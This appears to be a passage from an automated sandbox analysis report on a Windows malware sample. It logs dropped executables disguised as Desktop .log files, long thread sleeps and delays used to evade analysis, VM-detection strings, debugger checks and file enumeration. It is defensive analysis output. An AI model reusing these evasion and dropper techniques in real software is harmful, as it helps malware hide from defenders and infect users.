                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 592302Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 592172Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 592062Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 591953Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 591843Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 591734Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 591612Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 591485Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 591359Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 591250Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 591140Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 591031Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 590921Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 590812Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 590703Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 590594Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 590469Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 590359Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 590250Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 590140Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 590031Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 589912Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 589781Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 589671Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 589562Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6810Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2811Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeWindow / User API: threadDelayed 3433Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeWindow / User API: threadDelayed 6232Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeDropped PE file which has not been started: C:\Users\user\Desktop\jYCYFtEB.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeDropped PE file which has not been started: C:\Users\user\Desktop\GYwcCMoE.logJump to dropped file
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\QRPSxHgy.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeDropped PE file which has not been started: C:\Users\user\Desktop\WzsROUza.logJump to dropped file
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\aEtIhTbg.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeDropped PE file which has not been started: C:\Users\user\Desktop\pQfxiZJp.logJump to dropped file
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\HnGdNOQQ.logJump to dropped file
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\vCAeICGo.logJump to dropped file
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\YuXIhBvf.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeDropped PE file which has not been started: C:\Users\user\Desktop\vJIWLFOd.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeDropped PE file which has not been started: C:\Users\user\Desktop\UFpBXUVk.logJump to dropped file
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\ZlAIxOci.logJump to dropped file
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exe TID: 7900Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8068Thread sleep count: 6810 > 30Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8068Thread sleep count: 2811 > 30Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7196Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe TID: 7240Thread sleep time: -30000s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe TID: 4412Thread sleep time: -23980767295822402s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe TID: 4412Thread sleep time: -600000s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe TID: 4412Thread sleep time: -599869s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe TID: 4412Thread sleep time: -598640s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe TID: 4412Thread sleep time: -598469s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe TID: 4412Thread sleep time: -598297s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe TID: 4412Thread sleep time: -597469s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe TID: 4412Thread sleep time: -596890s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe TID: 4412Thread sleep time: -596757s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe TID: 4412Thread sleep time: -596500s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe TID: 1420Thread sleep time: -10800000s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe TID: 4412Thread sleep time: -596105s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe TID: 4412Thread sleep time: -595851s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe TID: 4412Thread sleep time: -595703s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe TID: 4412Thread sleep time: -595504s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe TID: 4412Thread sleep time: -595359s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe TID: 4412Thread sleep time: -595249s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe TID: 4412Thread sleep time: -595138s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe TID: 4412Thread sleep time: -595031s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe TID: 4412Thread sleep time: -594797s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe TID: 4412Thread sleep time: -594656s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe TID: 4412Thread sleep time: -594526s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe TID: 4412Thread sleep time: -594417s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe TID: 4412Thread sleep time: -594305s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe TID: 4412Thread sleep time: -594169s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe TID: 4412Thread sleep time: -594043s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe TID: 4412Thread sleep time: -593922s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe TID: 1420Thread sleep time: -600000s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe TID: 4412Thread sleep time: -593797s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe TID: 4412Thread sleep time: -593663s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe TID: 4412Thread sleep time: -593484s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe TID: 4412Thread sleep time: -593193s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe TID: 4412Thread sleep time: -593069s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe TID: 4412Thread sleep time: -592858s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe TID: 4412Thread sleep time: -592750s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe TID: 4412Thread sleep time: -592640s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe TID: 4412Thread sleep time: -592531s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe TID: 4412Thread sleep time: -592422s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe TID: 4412Thread sleep time: -592302s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe TID: 4412Thread sleep time: -592172s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe TID: 4412Thread sleep time: -592062s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe TID: 4412Thread sleep time: -591953s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe TID: 4412Thread sleep time: -591843s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe TID: 4412Thread sleep time: -591734s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe TID: 4412Thread sleep time: -591612s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe TID: 4412Thread sleep time: -591485s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe TID: 4412Thread sleep time: -591359s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe TID: 4412Thread sleep time: -591250s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe TID: 4412Thread sleep time: -591140s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe TID: 4412Thread sleep time: -591031s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe TID: 4412Thread sleep time: -590921s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe TID: 4412Thread sleep time: -590812s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe TID: 4412Thread sleep time: -590703s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe TID: 4412Thread sleep time: -590594s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe TID: 4412Thread sleep time: -590469s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe TID: 4412Thread sleep time: -590359s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe TID: 4412Thread sleep time: -590250s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe TID: 4412Thread sleep time: -590140s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe TID: 4412Thread sleep time: -590031s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe TID: 4412Thread sleep time: -589912s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe TID: 4412Thread sleep time: -589781s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe TID: 4412Thread sleep time: -589671s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe TID: 4412Thread sleep time: -589562s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe TID: 7384Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Windows\System32\svchost.exe TID: 7400Thread sleep time: -30000s >= -30000s
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe TID: 7628Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeFile Volume queried: C:\ FullSizeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeFile Volume queried: C:\ FullSizeInformation
                                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E3A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00E3A69B
                                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E4C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00E4C220
                                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E4E6A3 VirtualQuery,GetSystemInfo,0_2_00E4E6A3
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 30000Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 600000Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 599869Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 598640Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 598469Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 598297Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 597469Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 596890Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 596757Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 596500Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 3600000Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 596105Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 595851Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 595703Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 595504Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 595359Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 595249Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 595138Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 595031Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 594797Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 594656Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 594526Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 594417Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 594305Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 594169Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 594043Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 593922Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 300000Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 593797Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 593663Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 593484Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 593193Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 593069Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 592858Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 592750Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 592640Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 592531Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 592422Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 592302Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 592172Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 592062Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 591953Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 591843Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 591734Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 591612Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 591485Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 591359Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 591250Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 591140Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 591031Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 590921Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 590812Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 590703Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 590594Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 590469Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 590359Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 590250Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 590140Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 590031Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 589912Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 589781Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 589671Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 589562Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeThread delayed: delay time: 922337203685477
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeFile opened: C:\Users\userJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeFile opened: C:\Users\user\AppDataJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                                  Source: wscript.exe, 00000001.00000003.1761409239.0000000000850000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                  Source: svchost.exe, 00000012.00000002.2910275758.00000181EF858000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.2910214045.00000181EF842000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.2908176167.00000181EA22B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                  Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2907348176.000000000165D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                  Source: file.exe, chainportruntimeCrtMonitor.exe.0.dr, kahKUDRlEYHfKIalWlM.exe.4.drBinary or memory string: GfgiOL4kQeMUghnPQxcH
                                  Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25012
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeProcess information queried: ProcessInformationJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeCode function: 4_2_00007FFD9B94340A rdtsc 4_2_00007FFD9B94340A
                                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E4F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00E4F838
                                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E57DEE mov eax, dword ptr fs:[00000030h]0_2_00E57DEE
                                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E5C030 GetProcessHeap,0_2_00E5C030
